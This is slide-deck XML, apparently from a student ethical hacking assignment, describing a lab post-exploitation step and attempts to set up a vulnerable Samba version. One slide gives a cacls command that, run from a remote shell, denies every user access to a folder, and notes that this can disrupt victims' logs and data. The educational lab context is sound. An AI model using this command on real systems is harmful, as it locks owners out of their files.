          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4459600" y="1665950"/>
            <a:ext cx="4636750" cy="3477550"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="791" name="Google Shape;791;p91"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6226325" y="169175"/>
            <a:ext cx="2764100" cy="1998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0"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="fade" transition="in">
                                      <p:cBhvr>
                                        <p:cTn dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="7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pic>
        <p:nvPicPr>
          <p:cNvPr id="796" name="Google Shape;796;p92"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4283188" y="907300"/>
            <a:ext cx="4860812" cy="4262850"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="797" name="Google Shape;797;p92"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="178725"/>
            <a:ext cx="4606500" cy="945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Denying Access to Important Files</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="798" name="Google Shape;798;p92"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="379800" y="1124100"/>
            <a:ext cx="3846900" cy="229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Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>In the Windows Server, a folder is created to simulate an important folder.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>In the active Windows command shell </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>session</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t> in Kali Linux, the important folder can be seen using the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>dir </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>command in the Documents directory.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="799" name="Google Shape;799;p92"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="14229" l="8316" r="15805" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4738275" y="541424"/>
            <a:ext cx="4405724" cy="26045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93"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="192975"/>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Denying Access to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es"/>
              <a:t>Important Files</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="805" name="Google Shape;805;p93"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4905625" y="1768800"/>
            <a:ext cx="3767400" cy="203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Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Using the command</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" u="sng">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>cacls “[path directory of important folder]” /P everyone:N</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t> and entering “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>y</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>” after that to confirm, all users are denied any access to the important folder.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>The image shows two errors when clicking on the important folder after the command is ran, even though administrative rights is given. This is because the permissions are denied.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="806" name="Google Shape;806;p93"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="1025825"/>
            <a:ext cx="4606399" cy="2967926"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="807" name="Google Shape;807;p93"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="338138" y="797275"/>
            <a:ext cx="8467725" cy="809625"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="808" name="Google Shape;808;p93"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="9074" l="14299" r="27547" t="28472"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="3641650"/>
            <a:ext cx="2678601" cy="14021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94"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="192975"/>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Denying Access to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es"/>
              <a:t>Important Files</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="814" name="Google Shape;814;p94"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5134225" y="1768800"/>
            <a:ext cx="3767400" cy="216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Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>This can be done on actual important files such as logs and data, which can affect victims and businesses from their work process.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>The video is a demonstration of denying access to files with an active Windows shell session.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="815" name="Google Shape;815;p94" title="EH Assignment Denying File Access Post Exploit">
            <a:hlinkClick r:id="rId3"/>
          </p:cNvPr>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="1068894"/>
            <a:ext cx="4753225" cy="356490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5"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="fade" transition="in">
                                      <p:cBhvr>
                                        <p:cTn dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="8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95"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1984700" y="3670025"/>
            <a:ext cx="6382200" cy="606600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es"/>
              <a:t>08. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es"/>
              <a:t>References and Additional Troubleshooting</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96"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="145375" y="226025"/>
            <a:ext cx="86319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Methods in Obtaining Vulnerable Samba Version</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="826" name="Google Shape;826;p96"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="123150" y="1002350"/>
            <a:ext cx="4945200" cy="22626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lt1"/>
              </a:buClr>
              <a:buSzPts val="1500"/>
              <a:buFont typeface="Roboto Light"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr i="1" lang="es" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Compiling from source </a:t>
            </a:r>
            <a:endParaRPr i="1" sz="1500">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="es" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>FAILED</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t> since </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>dependencies</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t> are missing)</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-323850" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1500"/>
              <a:buFont typeface="Roboto Light"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr i="1" lang="es" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Installing using jessie deb packages  </a:t>
            </a:r>
            <a:endParaRPr i="1" sz="1500">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="es" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>NOT FEASIBLE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t> since too many dependencies to download)</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-323850" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1500"/>
              <a:buFont typeface="Roboto Light"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr i="1" lang="es" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Downloading Ubuntu 16.04 </a:t>
            </a:r>
            <a:endParaRPr i="1" sz="1500">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="es" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>FAILED </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>to be exploited -- refer to next few slides)</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="827" name="Google Shape;827;p96"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1731400" y="3325350"/>
            <a:ext cx="3093300" cy="1584999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="828" name="Google Shape;828;p96"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
